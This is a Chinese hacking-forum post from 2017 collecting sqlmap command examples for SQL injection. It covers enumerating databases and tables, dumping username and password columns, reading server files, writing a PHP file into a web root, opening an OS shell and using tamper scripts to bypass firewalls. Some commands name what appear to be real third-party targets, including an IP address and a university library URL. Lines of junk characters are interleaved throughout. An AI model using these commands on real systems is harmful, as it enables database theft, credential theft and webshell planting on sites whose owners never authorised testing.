中国网络渗透测试联盟
标题:
sqlmap使用实例
[打印本页]
作者:
admin
时间:
2017-5-19 17:03
标题:
sqlmap使用实例
/pentest/database/sqlmap
8 q0 L# ? i$ J) G0 ?
, X$ n: K$ n0 ^( q0 @* K
update :::::> in the folder after execute following order : svn update
6 ~' A4 L1 X- q( y7 U, e! ~
& t ], Z6 U4 X6 z
sqlmap.py -r 1.txt --current-db
3 [2 E' Z. j! D3 v
) U- i: z& r7 x! O
v 3 –dbms “MySQL” –technique U -p id –batch –tamper “space2morehash.py”
* S4 o n" [6 Q
0 G: I/ {, w" i7 ^4 A, a/ C
==================基本使用方法==========================elect (select concat(0x7e,0x27,username,0x3a,password,0x27,0x7e) from phpcms_member limit 0,1))
/ l( D8 N! Q" E1 M
猜解数据库
/ s5 z5 g& F8 I9 o \# X, z0 N1 G
./sqlmap.py -u "injection-url" --dbs
% A) Y: |) h7 ]* C, v
sqlmap.py -r 1.txt -v 3 --dbs --tamper "space2morehash.py"
8 c* J, n% Y1 D* g* f- N3 U
7 q( I6 V4 x$ ? L
猜解表名
' w8 l# Q9 Y" n$ U7 M
./sqlmap.py -u "injection-url" -D database_name --tables
' q8 M( `- `8 O5 V. a& U$ ]4 k, {& ~
1 e& C! T! ?) L2 P. ~
sqlmap.py -r 1.txt -v 1 -D jsst --tables --batch --tamper "space2morehash.py"
8 d' }5 T5 ^! Z2 ?
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member_info --columns --batch --tamper "space2morehash.py"
! B+ ?" j1 B6 }: A
; ~( X" i& {& A& E% `! q
sqlmap.py -r 1.txt -D mail -T F_domain -C F_email,F_password --dump
$ H# q0 G3 i% J& J: A
2 ]. T3 z/ q0 ?2 i9 q' d4 Q5 ?
sqlmap.py -r 1.txt -v 1 --os-shell --tamper "chardoubleencode.py"
2 b' S: i& e9 l2 h& A3 t) z
sqlmap.py -r 1.txt -v 3 --os-shell --tamper "chardoubleencode.py"
! \$ o9 c, E: U3 j5 Q0 v
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:\Bitnami\wampstack-5.4.29-0\apache2\htdocs\en\fckeditor\help888.php --tamper "chardoubleencode.py"
, m; A9 _, m3 q6 t# a
sqlmap.py -r 1.txt --dbms "Mysql" --os-shell --tamper "charunicodeencode.py"
) ^ |+ ?/ [2 _. H
6 ?1 O; r" g% o# T K0 B* _ O$ W
sqlmap.py -u "http://121.15.0.227/en/list.php?catid=74" --os-shell -v3 --tamper "charunicodeencode.py"
! t# H& S; h c8 b* J
sqlmap.py -r 1.txt -v 3 --sql-query "desc jsgen_member;" --batch --tamper "space2morehash.py"
' f3 V) K; \# M6 ~) a
sqlmap.py -r 1.txt -v 3 --sql-query "show create table jsgen_member;" --batch --tamper "space2morehash.py"
6 r6 W$ ?( b+ K
sqlmap.py -r 1.txt -v 3 --sql-query "select user();" --batch --tamper "space2morehash.py"
- p; {& \* @3 ^$ q
sqlmap.py -r 1.txt -D jsst -T phpcms_member -C username,password --dump
8 }8 S# t" |6 K0 R2 o, R2 h h/ h
. |3 w2 N* k: ?+ Q8 j, `, V/ }
sqlmap.py -r 1.txt -v 3 --dbs --batch --tamper "space2morehash.py" 绕过防火墙了
$ p% v; N- r- k+ A
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C ,userid,username,password, --dump --batch --tamper "space2morehash.py"
; E3 {$ O& n) U: S, c, G" t
8 [6 V4 a" w: ^7 O: T% l
sqlmap.py -r 1.txt --dbms "Mysql" --tables -D "jsst"
& {8 }& M# r/ ? r* ~8 z
猜解列名
& R7 A8 E( k2 F- y+ ~
./sqlmap.py -u "injection-url" -D database_name -T table_name --columns
$ I) }% M$ }( {+ J" _! j
4 E* l4 p, ~8 C5 F
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member --columns --batch --tamper "space2morehash.py"
( y- H w9 b# h
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_session --columns --batch --tamper "space2morehash.py"
* M$ G, _& d% m4 N9 j$ l
sqlmap.py -r 1.txt -v 3 -D jsst -T jsgen_member -C userid,groupid,username,password,touserid,point,modelid,email,areaid --dump --batch --tamper "charunicodeencode.py"
: ]" q. u9 L$ M
H# n, F( P* P6 }- U; \9 c
sqlmap.py -u "http://cityusr.lib.cityu.edu.hk/jspui/simple-search?query=1" --batch --tamper "space2morehash.py"
% w6 O, Y0 s# y* d7 x; v' n
&submit=Go
6 Z v& P [. v
猜解值
0 F, y- V$ H' v
./sqlmap.py -u "injection-url" -D database_name -T table_name -C column1,column2 --dump
$ J7 M5 S1 X: v! s/ ]% v' P
========================================================
5 A' b. p4 p4 n! @- D" {& G1 A6 ^
搜索表名中包括mana字符的
' t& K# \6 Z- J5 t/ ~
/sqlmap.py -u "injection-url" -T mana --search
" I. f9 \0 {7 ^0 w: c1 {! B7 {: W. A
返回一个交互式sql shell
% v8 W8 E7 t! w9 P2 R U
/sqlmap.py -u "injection-url" --sql-shell
+ _% J) X/ _; B6 h. q; B7 {1 Z+ i
读取指定文件(需权限)
* v* b) F' {# d, v
/sqlmap.py -u "injection-url" --file-read "c:\boot.ini"
! [- w( X4 ~" w4 v, }
查看当前 用户 及 数据库
+ Y5 H0 _# e6 J: H8 U5 g
/sqlmap.py -u "injection-url" --current-user --current-db
2 p+ N9 \2 D/ ^% ?1 x ?. f0 D
本地文件 写入 远程目标绝对路径
3 {" [+ ]. m7 F5 t+ m1 I3 P
/sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
6 y: ~! Y7 A7 I( W8 R/ A
sqlmap.py -r 1.txt -v 3 --file-write c:\help.php --file-dest D:/Bitnami/wampstack-5.4.29-0/apache2/htdocs/en/fckeditor\help888.php --tamper "charunicodeencode.py"
" d/ k) h2 h$ O' s
3 f$ l8 X x1 {% o( Z* \3 s
sqlmap.py -u "injection-url" --file-write 本地路径 --file-dest 远程绝对路径
- a% l' o( \4 x- g" k7 u
查看某用的权限
2 o3 c- e. Z+ e& L5 v; s4 f! G
/sqlmap.py -u "injection-url" --privileges -U root
7 G W5 v8 c. L! P
查看当前用户是否为dba
" z& }5 N* ?- C
/sqlmap.py -u "injection-url" --is-dba
7 k% N' t9 x M( L$ c0 w( W
读取所有数据库用户或指定数据库用户的密码
! t" x9 ?0 ?" J
sqlmap.py -r 1.txt --users --passwords
0 q" ]" a' T$ K. z. K: a: L: f
sqlmap.py -r 1.txt -v 3 --users --passwords --batch --tamper "space2morehash.py"
' s! g. L: n' @
# o5 _) E# F2 w* b% |: |9 b6 |' g
/sqlmap.py -u "injection-url" --passwords -U root
. h2 K$ j n* t, S
# b) W: w) ^. T1 `
--start&&--stop 与 --first&&--last 的区别
% j1 h* y" D9 H7 t
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D phpcms -T phpcms_member --start=1 --stop=2 --dump (--start=1 --stop=2 会列出第二条记录。。。。记录例如:0 1 2 3 ……)
% Q( C. m. b4 \5 D, h6 U, }# B5 L. F
$ z6 o3 n7 t& z5 i. C
从字典中查找(属于暴利破解)存在的表(sqlmap/txt/common-tables.txt)或字段(sqlmap/txt/common-columns.txt)
2 {( P- y8 Y, R6 M( n' c9 |' j, d0 r$ G
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name --common-tables
5 a: H& m6 a& \$ \1 j9 v
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" -D database-name -T table_name --common-columns
, q" y i) D) a7 J' n2 Q5 q
# \0 O2 K; l" o( Z
执行sql语句,如查询@@datadir得到数据库路径(或者user()/database()等等……)
) Q d. t/ |* x4 L" i) `
/sqlmap.py -u "http://localhost/comment/index.php?keyid=1&itemid=1" --sql-query "select @@ip"
* u0 t/ t' l/ j( d3 `
& t' g. Q1 k; T& H' l; z$ g+ A, [
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2